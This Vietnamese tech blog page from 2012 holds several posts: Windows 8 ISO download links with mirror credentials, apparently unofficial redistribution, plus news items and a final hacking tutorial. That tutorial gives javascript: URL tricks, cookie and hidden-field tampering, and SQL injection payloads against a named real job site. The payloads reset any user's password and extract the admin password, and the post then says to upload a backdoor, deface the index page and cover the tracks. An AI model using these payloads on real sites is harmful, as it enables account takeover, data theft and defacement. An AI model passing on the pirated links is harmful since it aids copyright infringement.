Chia sẻ thông tin

KenjiVN - Quốc Trưởng

Search This Blog

Trưởng Nguyễn 's Blog

Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.

Trưởng Nguyễn 's Blog

Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.

Trưởng Nguyễn 's Blog

Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.

Trưởng Nguyễn 's Blog

Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.

Trưởng Nguyễn 's Blog

Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.

Thursday, August 16, 2012

Đã có thể download Windows 8 bản chính thức từ MSDN và TechNet



Đúng với lịch trình trong kế hoạch phát hành phiên bản Windows 8 RTM, vào 00 giờ sáng ngày 16 tháng 08 năm 2012 theo giờ Việt Nam, gã khổng lồ phần mềm Microsoft đã chính thức cho phép người dùng của 2 kênh MSDN và TechNet tải phiên bản Windows 8 chính thức về.
Người dùng MSDN và TechNet đã có thể download Windows 8 Final về




Một số thông tin kỹ thuật về phiên bản Windows 8 từ TechNet:

Windows 8 (x86) – DVD (English)
Tên tập tin: en_windows_8_x86_dvd_915417.iso
Ngôn ngữ: Tiếng Anh
Mã SHA1: 22D680EC53336BEE8A5B276A972CEBA104787F62
Download:   http://www.mediafire.com/?l2781s0b89nw4
hoặc:  http://iblackshop.net/iDownload/Windows8/en_windows_8_x86_dvd_915417.iso 
User: iBlackDownload
Pass: @25251325#

Windows 8 (x64) – DVD (English)
Tên tập tin: en_windows_8_x64_dvd_915440.iso
Ngôn ngữ: Tiếng Anh
Mã SHA1: 1CE53AD5F60419CF04A715CF3233F247E48BEEC4
Download:
http://iblackshop.net/iDownload/Windows8/en_windows_8_x64_dvd_915440.iso
User: iBlackDownload
Pass: @25251325#
Windows 8 Enterprise (x86) – DVD (English)
Tên tập tin: en_windows_8_enterprise_x86_dvd_917587.iso
Ngôn ngữ: Tiếng Anh
Mã SHA1: FEFCE3E64FB9EC1CC7977165328890CCC9A10656
Download:
http://iblackshop.net/iDownload/Windows8/en_windows_8_enterprise_x86_dvd_917587.iso
User: iBlackDownload
Pass: @25251325#
Windows 8 Enterprise (x64) – DVD (English)
Tên tập tin: en_windows_8_enterprise_x64_dvd_917522.iso
Ngôn ngữ: Tiếng Anh
Mã SHA1: 4EADFE83E736621234C63E8465986F0AF6AA3C82
Download:
http://iblackshop.net/iDownload/Windows8/en_windows_8_enterprise_x64_dvd_917522.iso
User: iBlackDownload
Pass: @25251325#
Windows 8 Pro V L (x86) – DVD (English)
Tên tập tin: en_windows_8_pro_v l_x86_dvd_917830.iso
Ngôn ngữ: Tiếng Anh
Mã SHA1: 548AB51161FD83B889596B143D86C1EEB61EF2D0

Windows 8 Pro V L (x64) – DVD (English)
Tên tập tin: en_windows_8_pro_v l_x64_dvd_917699.iso
Ngôn ngữ: Tiếng Anh
Mã SHA1: 6DDEDEBE40AB59CB11823F62F475C43C4053FE60

Như vậy người dùng MSDN và TechNet được download Windows 8 Final trước ngày ra mắt chính thức khoảng 2 tháng. Dự kiến, phiên bản Windows 8 Final sẽ chính thức được lên kệ vào ngày 26 tháng 10 tới.

Mình sẽ liên tục update những link download của Windows 8 tại đây.

Tuesday, August 14, 2012

Viettel, VNPT hợp tác xây cáp quang biển với Facebook


Viettel và VNPT vừa cùng với mạng xã hội lớn nhất thế giới Facebook tham gia vào dự án xây dựng hệ thống cáp quang biển Asia Submarine-cable Express (ASE).

ưviettel-vnpt-hop-tac-xay-cap-quang-bien-voi-facebook
  Hệ thống cáp quang biển ASE sẽ kết nối Malaysia, Hàn Quốc và Nhật Bản và có nhánh đến Việt Nam. Ảnh: SubmarineNetworks.com.

 
Trang thông tin của Singapore là TodayOnline cho biết, tổng vốn đầu tư của dự án ước tính là 450 triệu USD. Facebook là nhà đầu tư lớn nhất trong dự án này. Tuy nhiên, Facebook từ chối tiết lộ chi tiết khoản đầu tư này của hãng.

Đáng lưu ý là một trang tin khác của Singapore là SGE (sgentrepreneurs.com) nói rằng sau khi tiết lộ việc Facebook là một nhà đầu tư, thì dự án này đã được đổi tên từ Asia-Pacific Gateway (APG) thành Asia Submarine-cable Express (ASE). Và quy mô hệ thống cáp ban đầu là 7.200km đã tăng lên hơn 10.000km khi có nhiều quốc gia tham gia hơn.

Hệ thống cáp quang biển này sẽ kết nối Malaysia đến Hàn Quốc và Nhật Bản, với 7 chi nhánh rẽ ra các quốc gia Asian khác bao gồm Trung Quốc, Hong Kong, Singapore, Thái Lan và Việt Nam. Ngoài ra, ASE có thể được kết nối đến các hệ thống cáp lớn khác đến châu Âu, Trung Đông, các phần khác của châu Á và Mỹ. 

Dự án này sẽ hoàn thành vào quý 3/2014, giúp tăng tốc độ kết nối Internet trong khu vực châu Á. Hệ thống cáp sẽ có tổng dung lượng thiết kế là 54,8 terabit/giây, dùng công nghệ chiều dài bước sóng 40Gbps, nhưng trong tương lai có thể tăng khả năng bước sóng lên 100Gbps. 

Theo các thông tin đăng trên BBC, dự án này được cho sẽ mang lại “một trải nghiệm người dùng tốt hơn cho những người dùng Facebook ở các nước như Ấn Độ, Indonesia, Malaysia, Philippines, Hong Kong, và Singapore”, và nó phản ánh “con đường của Facebook tiến vào phương Đông”, nơi hiện đang có tỷ lệ tăng trưởng tốt, trong khi lượng người dùng của Facebook tại Mỹ đã bão hoà. 

Ngoài hai hãng viễn thông của Việt Nam là Viettel và VNPT, dự án này còn có sự tham gia của 10 hãng viễn thông khác trên thế giới, bao gồm China Mobile, China Telecom, China Unicom của Trung Quốc, Chunghwa Telecom của Đài Loan, các nhà mạng Hàn Quốc KT và LG Uplus, hãng viễn thông Nhật Bản NTT Communications, StarHub của Singapore, Time dotcom của Malaysia, Philippine Long Distance Telephone (PLDT) của Philippine. 

Theo  Bảo Bình/ICTnews

Angry Birds giới thiệu nhân vật "nữ" đầu tiên


Tuần trước NSX Rovio đã úp mở về việc ra mắt một nhân vật nữ mới có khả năng sẽ tạo nên bước ngoặt của tựa gameAngry Bird. Đa số dự đoán đều cho rằng đó sẽ là một chú chim, bởi vì thực sự thì Rivio game chưa từng cho ra mắt nhân vật mới là một… chú heo nào cả (!?) Giờ thì câu trả lời đã có, và số đông người dự đoán đã chính xác.
 
angry-birds-gioi-thieu-nhan-vat-nu-dau-tien
 
Hiện tại thì cộng đồng hâm mộ Angry Birds đã và đang chào đón sự xuất hiện của nàng chim màu hồng xinh xắn, “nàng” sẽ có mặt trong season mới nhất của Angry Bird. Ngoài thông tin được tiết lộ trên Twitter, Rovio cũng tặng thêm cho các game thủ một đoạn video ngắn giới thiệu về những hình ảnh đầu tiên của thành viên mới trong Angry Bird.
 
Trong đó,“nàng” chim mới này nổi bật với khả năng thổi bong bóng. Thực tế, chi tiết đó tạo nên sự ấn tượng đối với người xem và chúng ta sẽ tự hỏi liệu đây có phải là sức mạnh độc nhất của “nàng ta” hay không? Hay đây chỉ là một chi tiết dễ thương được game studio đưa vào nhằm thu hút sự chú ý của người xem?
 
 
Theo Thanh Sơn/GameK/Android Police

Kinh hoàng trước cảnh làm pin điện thoại rởm

Hẳn bạn từng cảm thấy khó khăn khi tìm mua loại pin thay thế cho dế cưng. Sẽ thế nào nếu bạn ghé thăm những địa chỉ làm pin siêu tốc trong 5 phút, kích thước vừa vặn và giá bán cực rẻ? Tại thủ đô Bắc Kinh (Trung Quốc), người dùng dễ dàng tìm thấy hàng trăm cửa hàng chế tạo pin rởm và họ luôn sẵn sàng đáp ứng mọi nhu cầu của bạn.
 
Bước vào một cửa hàng như thế, bạn sẽ nhìn thấy vô số viên pin dạng thô với đủ các kích cỡ. Khi được hỏi, nhân viên chế tạo pin sẽ nhiệt tình giới thiệu cách thức gia công một cục pin chỉ trong vòng 5 phút với 3 bước.
 
kinh-hoang-truoc-canh-lam-pin-dien-thoai-rom
 
Bước 1: Đầu tiên, họ tìm một cục pin thô vừa vặn cho điện thoại của bạn. Nếu nó không vừa, người ta có thể "thu nhỏ hoặc phóng to" kích cỡ của pin trong nháy mắt.
 
Bước 2: Họ gắn đầu kết nối (có hình dạng như một dải dài) vào các điểm tiếp xúc bằng đồng, phần thừa được cắt gọn bằng kìm sau khi vị trí được cố định.
 
Bước 3: Cuối cùng, nhân viên sẽ làm vài động tác bằng tay để nhét vừa cục pin vào điện thoại.
 
kinh-hoang-truoc-canh-lam-pin-dien-thoai-rom
Pin rởm gia công ngay tại chỗ có chất lượng rất kém.
 
kinh-hoang-truoc-canh-lam-pin-dien-thoai-rom
Trung Quốc là nơi sản xuất pin nhái nhiều nhất quả đất.
 
Hẳn bạn sẽ thắc mắc việc sử dụng pin rởm liệu có an toàn hay không? Một người chế tạo pin nhái khẳng định, anh chưa bao giờ gặp trường hợp tai nạn nào với hàng chục ngàn cục pin xuất xưởng. Bên cạnh đó, dân kinh doanh cho biết, họ hiếm khi nghe thấy những tin đồn về chuyện pin rởm đột ngột phát nổ.
 
Tuy nhiên, có một sự thật chắc chắn rằng, những cục pin nhái chẳng hề được kiểm tra chất lượng hoặc tính an toàn. Bởi vậy, bạn không nên sử dụng chúng trong mọi trường hợp.
 
Theo Kênh14

Giỡn chơi một tí: với hack website = javascript


Lâu quá hình như chưa có trương trình hack nèo coi đã mắt nên quyết định chỉ cho anh em mới vô nghề vài mánh để giởn chơi còn kết quả ra sao thì không nói trước có bị quánh thì đừng nói là của tui (vì nguồn st mà) đã thữ rồi kết quã tốt lắm. Nhưng nói trước nghe tuỳ vào IQ cua anh em như thế nào => kết quả như vậy. và mình không chỉ thêm bất cứ vấn đề gì trong chuyên mục này vì bái viết quá rõ, hướng dẫn tĩ mỹ và thật chi tiết và mình cũng đã test thử thấy kết quả là chính xác. Nên trước khi nói là làm không được thì các bạn nên xem lại cho thật kỹ mình đã làm như thế nào
VÔ VẤN ĐỀ
Đầu tiên bạn mở trang web victim lên !
Vào thanh Address chứa link trang web victim xóa sạch link , copy và pase vào đoạn code sau vào


Code:
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0


Và bây giờ bạn có thể làm gì trang web của victim cũng đc , thao tác như notepad
(Và trên đây là minh chứng microsoft bị phá hủy trong nháy mắt)
Hiiiii anh em làm xong đừng nóng

cái này chỉ dành cho mấy mem yếu tim thôi. hi hi



bổ sung thêm cái Hack Web Bằng JavaScript-Inline




[SANITC] : Trong bài viết này mình sẽ giới thiệu với các bạn về kĩ thuật hack web chỉ dùng JavaScript. Với kĩ thuật này, bạn có thể xem xét và hiệu chỉnh giá trị của các cookie hoặc trường ẩn trực tiếp ngay trên trang web. Tất cả chỉ với một trình duyệt web hổ trợ "debug javascript-inline", chẳng hạn như Internet Explorer, Netscape hay Mozilla, ... Cơ bản về JavaScript-Inline^^

Đa số các trình duyệt web đều hổ trợ JavaScript-Inline.
Bạn có thể thi hành JavaScript bằng cách gõ vào thanh URL như sau:
Code:
javascript:void(<đặt lệnh JavaScritpt ngay tại đây!>)
Ví dụ:

Để xem giá trị hiện tại của cookie bạn gõ :
Code:
javascript:alert(document.cookie)
Hoặc
để thay đổi giá trị của trường ẩn "hiddenid" của form đầu tiên thành "2", bạn gõ:
Code:
javascript:void(document.forms[0].hiddenid.value="2")
Mã nguồn HTML có đoạn như sau:
...

Code:
var a=unescape("%43%4f%44%45%5a");
Code:
function check(){if (document.a.c.value == a){document.location.href="http://scifi.pages.at/hackits/"+document.a.c.value+".htm";}else{alert ("wrong! - letter size?");}}}

Đơn giản bạn có thể gõ thẳng vào thanh URL của IE như sau:
Code:
javascript:alert(unescape(a)) để lấy password của level tiếp theo("CODEZ")

Realistic mission 8 trên hackthisite.org yêu cầu bạn chuyển 10 triệu đô từ tài khoản của "Gary Hunter" vào tài khoản "dropCash".
Sau khi bạn dùng SQL-Injection để lấy username của "Gary Hunter", bạn tiến hành chuyển tiền như sau:

Đăng nhập vào tài khoản của bạn. Trên thanh URL của IE bạn gõ vào:
Code:
javascript:void(document.write('< name="the_" ="movemoney.php" method="post"><value="GaryWilliamHunter" name="FROM" ="">< value="dropCash"name="TO" ="">< value="10000000" name="AMOUNT" =""><value="Move Money To A Different Account" ="submit">'))
Đoạn JavaScript trên sẽ tạo một form với trường ẩn 

Code:
FROM=GaryWilliamHunter, TO=dropCash, AMOUNT=10000000
Bây giờ bạn thay đổi cookie lại như sau:
Code:
javascript:void(document.cookie="accountUsername=G aryWilliamHunter")javascript:void(document.cookie="accountPassword=G aryWilliamHunter")

Ấn nút "Move Money To A Different Account" một cái là xong.

Mình nghĩ rất có khả năng là mission 8 tạo một session("LoggedIn").
Mỗi lần chúng ta đăng nhập vào nó sẽ đặt session("LoggedIn")=1. Chúng ta chỉ cần thay đổi lại giá trị của cookie và trường ẩn để thực hiện việc chuyển tiền trong session của chúng ta
vì nó chỉ kiểm tra sesion("LoggedIn")=1 mà không kiểm tra username thực sự là ai.

Ví dụ cuối cùng, mình sẽ trình bày về cách hack trang web
http://www.mangvieclam.com/.

Sau khi đã đăng nhập vào mangvieclam.com, bạn gõ vào thanh URL dòng javascript:alert(document.cookie) để xem cookie.

Ban có thể thay đổi thông tin cá nhân của một user bất kì trên mangvieclam.com bằng cách đổi lại cookie username như sau: javascript:void(document.cookie="username=tên user"), sau đó chọn mục "Cập nhập thông tin"

Bạn cũng có thể thay đổi password của một user bất kì trên mangvieclam.com sau khi đã login vào với account của mình như sau: chọn mục "Thay đổi mật khẩu", gõ dòng javascript:void(document.cookie="username=tên user"+escape("' or '1'='1")) vào thanh URL, nhập password cũ là gì cũng được và password mới, sau đó ấn nút "Thay đổi mật khẩu".

Lỗi này nằm trong file icl/filerec/detail.asp, dòng thứ 43..65. Ví dụ, khi bạn set cookie username là "trungkien' or '1'='1", các câu lệnh SQL sau sẽ được thực thi:
Code:
Select Count(UserID) As Check From tblUserInfo Where UserID = 'trungkien' or '1'='1' And Passwords='md5(password cũ sai)' And Active = 1982 // luôn trả về true do điều kiện or '1'='1' đúng mặc dù password cũ sai

Code:
Update tblUserInfo Set Passwords = 'md5(password mới)' Where UserID = 'trungkien' or '1'='1' And Active = 1982 // luôn set password mới cho user "trungkien" do điều kiện UserID = 'trungkien' đúng trước điều kiện '1'='1'
Rất tiếc là lỗi này không thể khai thác trên
LINK :http://www.mangvieclam.com/
do lỗi lập trình.
Code:
Select Count(UserID) As Check From tblUserInfo Where UserID = N'trungkien' or '1'='1' And Passwords = N'...' And Active = 1982
Tuy nhiên, website
LINK :http://www.mangvieclam.com/
dùng CSDL MS-SQL nên mình dễ dàng lấy được username và password của admin từ tblConfig như sau:
Code:
Đầu tiên mình lấy username bằng javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminid from tblconfig where accid=1))--"))
Chọn mục "Cập nhập thông tin"

Tên đăng nhâp của admin là 'ngtuan'

Tương tự mình lấy password của admin bằng

Code:
javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminpass from tblconfig where accid=1))--"))
Bây giờ mình đặt lại password mới là 'hacked'
HTML
Code:
<form action=http://www.mangvieclam.com/log.asp method=post>username: <input type=text name=username><br>password: <input type=password name=password><br><input type=hidden name=ChoseLogin value=3><input type=hidden name=mod value=1><input type=submit value=login></form>
Upload backdoor và thay đổi trang index.asp. Sau đó restore lại pasword cũ cho admin để tránh bị phát hiện:
Code:
javascript:void(document.cookie="username="+escape ("';update tblconfig set adminpass='...' where accid=1--"))
Một giải pháp cho mangvieclam.com là bạn nên chuyển biến Request.Cookies("UserName") thành biến phiên Session("UserName") để tránh bị giả mạo username như ở trên.

<---------THE END----------->
Chúc các bạn thành công. Nên nhớ rằng dùng để học hỏi không nên lấy để đi phá các bạn có thể tạo stile trên free host và áp dụng xem sao